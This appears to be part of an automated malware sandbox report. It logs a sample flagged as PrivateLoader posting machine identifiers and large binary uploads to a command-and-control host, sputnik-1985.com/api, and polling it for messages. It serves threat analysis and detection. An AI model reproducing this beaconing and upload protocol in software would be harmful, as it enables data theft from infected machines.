2025-01-07 12:17:11 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 12:17:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49767 | 104.21.48.1 | 443 | 612 | C:\Users\user\Desktop\BnJxmraqlk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:17:12 UTC | 274 bytes | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=12HYARPH96
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 19910
Host: sputnik-1985.com
2025-01-07 12:17:12 UTC | 15331 bytes | OUT
Data Ascii:
--12HYARPH96
Content-Disposition: form-data; name="hwid"

639F9CFCAF29E24A822D1F4978021086
--12HYARPH96
Content-Disposition: form-data; name="pid"

3
--12HYARPH96
Content-Disposition: form-data; name="lid"

hcQl0m--
--12HYARPH96
Content-Dispo
2025-01-07 12:17:12 UTC | 4579 bytes | OUT
Data Raw: binary payload (omitted)
2025-01-07 12:17:13 UTC | 1131 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 12:17:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=nv4b4gvdibg2d4p3gq8u3b3qkj; expires=Sat, 03 May 2025 06:03:52 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5yYPyPEKeWh8No%2B5Jw54AFRgXczNmi5aGUTgKK2SCiI%2FuM5hegRxQHPk0utylyZfaaVV17FoPWQz8rlL4cNqdharF892P%2BWFvjGz5og2q7nzfMub0Yw%2BR0w4TVu%2FhKGMz8V%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe3e226deff43be-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1568&rtt_var=608&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2841&recv_bytes=20864&delivery_rate=1862244&cwnd=226&unsent_bytes=0&cid=d33a31939d1aa591&ts=621&x=0"
2025-01-07 12:17:13 UTC | 20 bytes | IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-07 12:17:13 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49783 | 104.21.48.1 | 443 | 612 | C:\Users\user\Desktop\BnJxmraqlk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:17:14 UTC | 277 bytes | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Z2XGBDWYJ5FRQRE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 922
Host: sputnik-1985.com
2025-01-07 12:17:14 UTC | 922 bytes | OUT
Data Ascii:
--Z2XGBDWYJ5FRQRE
Content-Disposition: form-data; name="hwid"

639F9CFCAF29E24A822D1F4978021086
--Z2XGBDWYJ5FRQRE
Content-Disposition: form-data; name="pid"

1
--Z2XGBDWYJ5FRQRE
Content-Disposition: form-data; name="lid"

hcQl0m--
--Z2XGBDWYJ5
2025-01-07 12:17:14 UTC | 1126 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 12:17:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=bbtbc7llu5jthcjtngm5tmnm01; expires=Sat, 03 May 2025 06:03:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54dwixtPX3xAqzmCjyASfZgNLIDTmcrcCY985z%2FD51UGj5%2F5QlTcmdQhThcX8CywWhns7nDrZdHpdRnJOKq40PPYhZ93gWokZc0ddG6CY%2FkU8v33e4NmcRZtZOm%2FQqkwd%2FqQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe3e231dd06c323-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1464&rtt_var=552&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1835&delivery_rate=1978319&cwnd=214&unsent_bytes=0&cid=0fed2944e9c97bd0&ts=359&x=0"
2025-01-07 12:17:14 UTC | 20 bytes | IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-07 12:17:14 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49792 | 104.21.48.1 | 443 | 612 | C:\Users\user\Desktop\BnJxmraqlk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:17:15 UTC | 284 bytes | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=5G3M9VPI83U93M4I1GM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 586875
Host: sputnik-1985.com
2025-01-07 12:17:15 UTC | 15331 bytes | OUT
Data Ascii:
--5G3M9VPI83U93M4I1GM
Content-Disposition: form-data; name="hwid"

639F9CFCAF29E24A822D1F4978021086
--5G3M9VPI83U93M4I1GM
Content-Disposition: form-data; name="pid"

1
--5G3M9VPI83U93M4I1GM
Content-Disposition: form-data; name="lid"

hcQl0m--
2025-01-07 12:17:15 UTC | 6 x 15331 bytes | OUT
Data Raw: binary payload chunks (omitted)
                                                                                                                                                                                                                          Data Ascii: p0T'~M5wmV2e\&z!4l]%++L-OVZzB9@tW<Q;BpEN'IS<=?z@e/n'S\(z#7A-kYjPT1f}|<1gw8-[8cD-EingK3:U*zTXZ
                                                                                                                                                                                                                          2025-01-07 12:17:15 UTC15331OUTData Raw: 48 5f b5 da 85 f8 6b 2a 35 85 97 68 ed d2 52 f0 28 cd 35 f4 5e 1d e5 58 be 1d 40 14 d6 1d c5 0a 36 22 8d 2d ba fc 85 be 12 b4 74 89 da e5 00 23 1a 29 02 d6 77 ec d8 0b a5 7f 1b 78 71 10 92 ba 25 57 4b f4 44 ab c9 73 88 54 8a 0c 92 79 d2 c4 96 33 c8 de 0b 8a bd e1 e2 23 d0 aa c8 9a f8 7b 74 cf 5e 2f 95 41 fb 08 4a b7 44 5e 07 3f c6 b7 1d af 94 c9 e4 14 9d 65 3d 59 25 e9 2c 1f 02 16 22 cb 0f 0d fe 85 8f a8 20 9a ed 29 30 84 be 96 6f 60 52 a7 61 c9 1e 49 27 85 63 f3 8d ee b5 84 72 24 1f 70 67 db 0c 2a f6 51 9c aa 48 28 f0 4f c8 9c 5a 1c 40 4b 92 c6 b6 04 0a fb c3 15 72 63 37 ce d9 35 3e d8 14 3d b6 5f 8b 4d 7a 10 de 6a 16 0a 2f 5e 0a c2 6c 84 c5 b6 54 27 3e 70 8e 47 2c 19 d5 28 41 99 f9 37 f8 62 60 46 be 8b 22 82 b0 35 a7 d3 f6 c1 25 aa b6 57 a8 5e 6f a9 49
                                                                                                                                                                                                                          Data Ascii: H_k*5hR(5^X@6"-t#)wxq%WKDsTy3#{t^/AJD^?e=Y%," )0o`RaI'cr$pg*QH(OZ@Krc75>=_Mzj/^lT'>pG,(A7b`F"5%W^oI
                                                                                                                                                                                                                          2025-01-07 12:17:15 UTC15331OUTData Raw: cd 53 97 03 fa 66 aa 65 cc 33 9b 39 e7 d7 d0 3c 0e 1f ad 32 5c 75 1c d0 9b 20 a9 13 c4 11 bd e8 bb a2 4b 2f a6 5b 60 c4 fc ec 65 38 12 7f 70 3b 53 36 e9 13 be 04 44 30 92 5e 28 21 82 22 82 e3 56 ef 08 67 36 d0 f8 10 2b 32 b8 44 5c 52 ab a5 1b ec 5c 09 02 11 84 4f eb cb 21 25 32 8d 60 c6 54 23 81 4d 1f 54 a6 27 32 0a 8e f3 06 5e 08 70 f0 0e f8 f1 cb 3c 27 a3 21 b8 ac e1 d2 9f c1 63 67 db 17 1a b7 b9 1f 57 4c e6 b1 8a ba 38 46 de b2 29 0f d1 22 ea f5 e4 28 3a fb f1 cd 02 26 5b fe 82 a7 19 8f b3 b1 e3 d4 60 c0 4b bb 4d 58 39 5a 70 2f 4b 95 ca 12 5c 04 b0 52 a9 46 50 4b 6d fa 37 2d b5 47 15 7c b6 44 10 47 ee 70 ce 22 a8 25 42 3a f5 41 83 24 d3 ab da 57 3a 50 2c 83 23 15 fe e2 b0 9b 6d 3c 24 92 0a 8f d1 b6 f3 9f a3 38 ea 44 ef d0 e8 fa 9d 2f c7 99 9c 21 38 a8
                                                                                                                                                                                                                          Data Ascii: Sfe39<2\u K/[`e8p;S6D0^(!"Vg6+2D\R\O!%2`T#MT'2^p<'!cgWL8F)"(:&[`KMX9Zp/K\RFPKm7-G|DGp"%B:A$W:P,#m<$8D/!8
                                                                                                                                                                                                                          2025-01-07 12:17:15 UTC15331OUTData Raw: 33 e5 e2 84 93 1b 67 94 5d 75 0e 19 ae 7d a6 16 20 21 ac a1 86 dc 38 5b 9e 3b 4e 96 5b 18 dd 53 1b c8 47 fd a6 e8 32 65 a0 20 cc 68 ac 2b 84 27 a9 9d ef 22 fc c3 a8 41 53 a3 fd 03 07 cb c3 3a f3 31 ee 83 f2 8d eb 2d 50 84 fe aa 66 87 21 13 7e 9a 7a 44 67 71 eb ee e8 84 79 ad a1 5c e1 23 b9 ef 3b 22 a6 13 5c 7e 48 69 40 8a f6 21 ed 83 c9 72 77 1d 75 9e 21 10 5a dc 4e 94 60 a4 33 ae 42 71 0e b1 fc d5 95 2b 32 7f 09 23 35 2b bf 4e a6 86 52 fd 3f 1b c7 de bc 1c ea 22 42 6a c6 d4 bf 67 a2 9f 9f c4 4d 53 7d a7 56 5d 52 93 45 48 61 c6 33 ff 1f 4b e7 1e cf f4 fb ff ff eb b5 8d cd 79 ce 67 1b 12 39 4e bd 13 72 98 43 51 0a 25 39 33 49 2a 44 0e c9 71 2f 67 9d d0 c1 a1 72 ac 74 74 26 c7 30 54 84 d0 c9 21 a7 09 21 c7 9c e6 b4 ed b7 3e df df 3f db cd ed c6 6e b6 5d cf
                                                                                                                                                                                                                          Data Ascii: 3g]u} !8[;N[SG2e h+'"AS:1-Pf!~zDgqy\#;"\~Hi@!rwu!ZN`3Bq+2#5+NR?"BjgMS}V]REHa3Kyg9NrCQ%93I*Dq/grtt&0T!!>?n]
2025-01-07 12:17:19 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 12:17:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3hev6lvlk3saftuj37kekhu37q; expires=Sat, 03 May 2025 06:03:57 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9lC19%2FiZb8%2Fx170At8GS9kmx%2F5AjHcMuSXBH2tLlNXQs%2BtjQIWLsqYzLl7IZmR6ansbw60N2JKEifXo%2FFeBH6GtLBKQAdeW1t%2BDcjOLPKLT5mH3JWSwFrdqjIvXq5MoA482"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe3e23a3b2f43be-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1565&rtt_var=587&sent=203&recv=605&lost=0&retrans=0&sent_bytes=2840&recv_bytes=589467&delivery_rate=1864623&cwnd=226&unsent_bytes=0&cid=a55dc3d5c6e62100&ts=3466&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49819 | 104.21.48.1 | 443 | 612 | C:\Users\user\Desktop\BnJxmraqlk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:17:19 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 77
Host: sputnik-1985.com
2025-01-07 12:17:19 UTC | 77 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 63 51 6c 30 6d 2d 2d 26 6a 3d 26 68 77 69 64 3d 36 33 39 46 39 43 46 43 41 46 32 39 45 32 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36
Data Ascii: act=get_message&ver=4.0&lid=hcQl0m--&j=&hwid=639F9CFCAF29E24A822D1F4978021086
2025-01-07 12:17:20 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 12:17:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=sl8651iqnmh4avnn747eth1gmg; expires=Sat, 03 May 2025 06:03:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WBcQrkFtOmLIbNAVW6EEOlGp%2FUmlK%2BEDRIrGETy9HUrDUBvi%2BEO20f8U%2F0Gl%2BhEQwGrjQXEFXw34Q3NpswMiwJ9h9Cf4LlR9k4iNiw1v7Kt5kW2N0vkrT9CgU5ArCZWSBawm"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe3e2531f5d43be-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1548&min_rtt=1538&rtt_var=598&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=977&delivery_rate=1798029&cwnd=226&unsent_bytes=0&cid=60c9d44f0c73196c&ts=474&x=0"
2025-01-07 12:17:20 UTC | 54 | IN | Data Raw: 33 30 0d 0a 64 34 55 42 36 4b 57 55 4a 57 2b 44 67 70 36 63 33 75 70 7a 42 57 4d 4d 33 76 38 6b 70 6d 42 56 4f 57 6e 54 58 4e 76 77 47 56 38 73 32 41 3d 3d 0d 0a
Data Ascii: 30d4UB6KWUJW+Dgp6c3upzBWMM3v8kpmBVOWnTXNvwGV8s2A==
2025-01-07 12:17:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



Target ID:0
Start time:07:16:54
Start date:07/01/2025
Path:C:\Users\user\Desktop\BnJxmraqlk.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\BnJxmraqlk.exe"
Imagebase:0x1c0000
File size:3'972'448 bytes
MD5 hash:356BDE316F31CFC2ED244A7CDD359617
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

No disassembly